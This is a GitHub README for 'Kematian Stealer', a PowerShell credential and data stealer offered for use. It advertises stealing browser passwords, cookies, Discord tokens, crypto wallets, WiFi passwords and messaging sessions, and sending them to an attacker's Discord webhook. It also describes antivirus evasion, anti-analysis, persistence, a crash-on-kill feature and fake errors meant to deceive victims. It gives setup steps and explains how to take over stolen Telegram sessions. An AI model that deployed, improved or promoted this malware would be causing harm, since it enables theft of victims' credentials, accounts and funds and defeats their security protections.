Skip to content

ChildrenOfYahweh/Kematian-Stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation



Kematian Stealer

About The Project

Kematian Stealer is a PowerShell-based tool designed to effortlessly infiltrate and exfiltrate data from Windows systems. All information collected is sent using Discord webhooks. It functions seamlessly across any x64bit system, from Windows 8 x64 to Windows 11 x64, ensuring compatibility with the latest updates. With Kematian Stealer, you can retrieve seed phrases, session files, passwords, application data, Discord tokens and more.

This tool is particularly advantageous for accessing application and file data without restrictions, while evading conventional security measures such as firewalls and antivirus software, thanks to its fileless capabilities, which set it apart from other stealers. Upon execution, Kematian Stealer creates a mutex on the system and designates the process as critical before initiating data exfiltration, ensuring smooth and uninterrupted transmission of data.

Moreover, the tool has robust persistence mechanisms to remain active on the machine after reboot. Additionally, its user-friendly GUI builder simplifies the process of creating payloads, enhancing its accessibility and usability.

Usage

  • Create a Webhook on your Discord Server, it's advisable to create a new server for this purpose.
  • After creating a server go to Edit channel > Integrations > Webhooks > Create Webhook
  • Copy the Webhook URL
  • Download main.ps1
  • Open main.ps1 and replace YOUR_WEBHOOK_HERE in line 1 with your webhook or use the builder.
  • Additionally, set $true for the variables you wish to activate. Conversely, utilize $false to deactivate them, as shown in configurations below.

Note

THE DEBUG OPTION IS FOR TESTING PURPOSES ONLY

Configurations

$webhook = "YOUR_WEBHOOK_HERE" 
$debug = $false
$blockhostsfile = $true
$criticalprocess = $true
$melt = $false
$fakeerror = $false
$persistence = $true

Requirements

  • To build Kematian, you need:
  • Windows 8 or higher x64.
  • Powershell v3.0 or higher.
  • An active internet connection.

Obfuscation

Screenshots

πŸ”¨ Builder

builder

Builder Features

  • πŸ”Έ Obfuscation of BAT and PS1 files
  • πŸ”© Compilation of Exe Files
  • πŸ’‰ Pump/Inject the output exe file with zero-filled bytes

πŸ”· Webhook Data

screenshot

webhook

Features

  • GUI Builder
  • Anti-Kill (Terminating Kematian will result in a system crash, indicated by a BSoD blue screen of death).
  • Mutex (single instance)
  • Force UAC
  • Antivirus Evasion: Disables AMSI , excluded from Windows Defender and blocks access to antivirus websites in hosts file.
  • Anti-Analysis VMWare, VirtualBox, Sandboxes, Emulators, Debuggers, Virustotal, Any.run
  • Persistence via Task Scheduler
  • Extracts WiFi Passwords
  • Files Stealer 2fa, backupcodes, seedphrases, passwords, privatekeys, etc.
  • πŸ“· Webcam & Desktop Screenshots
  • Session Stealers

    Messaging

    Gaming

  • VPN Clients
  • Email Clients
  • FileZilla Hosts
  • Crypto Wallets

    Armory | Atomic | Bitcoin | Bytecoin | Coinomi | Dash | Electrum | Ethereum | Exodus | Guarda | Jaxx | Litecoin | Monero | Zcash

  • Browsers Gecko Browsers and Chromium Browsers
    • πŸ”‘ Passwords
    • πŸͺ Cookies
    • πŸ“œ History
  • Extracts Discord tokens from Discord applications, Chromium browsers and Gecko browsers.
  • Get System Information (Version, CPU, DISK, GPU, RAM, IP, Installed Apps etc.)
  • Fake Error: Tricks the user into thinking that the program closed due to an error.
  • List of Installed Antiviruses
  • List of all Network Adapters
  • List of Apps that Run On Startup
  • List of Running Services & Applications
  • Extracts Product Key
  • Self-Destructs After Execution (optional)

Telegram Session Stealer Usage :

After the exfiltrated data is uploaded to your discord webhook, download the zip file and extract it on your PC, inside that folder there will also be another subfolder Messaging Sessions , inside this subfolder you will find the Telegram folder. Now, copy the tdata folder from Telegram folder and paste it in the directory below:

%userprofile%\AppData\Roaming\Telegram Desktop Before pasting the tdata folder, ensure that you have deleted or backup the existing tdata folder on your PC.

telegram

Note

The other session stealers can be utilized by applying the technique above

πŸ—‘ Uninstaller (Removes the Scheduled Task, Script Folder, ExclusionPaths and Resets Hosts File)

  • Open a new Elevated Powershell Console then copy & paste the contents below
$ErrorActionPreference = "SilentlyContinue"
function Cleanup {
  Unregister-ScheduledTask -TaskName "Kematian" -Confirm:$False
  Remove-Item -Path "$env:appdata\Kematian" -force -recurse
  Remove-MpPreference -ExclusionPath "$env:APPDATA\Kematian"
  Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
$resethostsfile = @'
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handle within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
'@
  [IO.File]::WriteAllText("$env:windir\System32\Drivers\etc\hosts", $resethostsfile)
  Write-Host "[~] Successfully Uninstalled Kematian !" -ForegroundColor Green
}
Cleanup

Need Help?

Bug Reports and Suggestions

Found a bug? Have an idea? Let me know here, Please provide a detailed explanation of the expected behavior, actual behavior, and steps to reproduce, or what you want to see and how it could be done. You can be a small part of this project!

License

This project is licensed under the MIT License - see the LICENSE file for details

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

Credits

Back to Top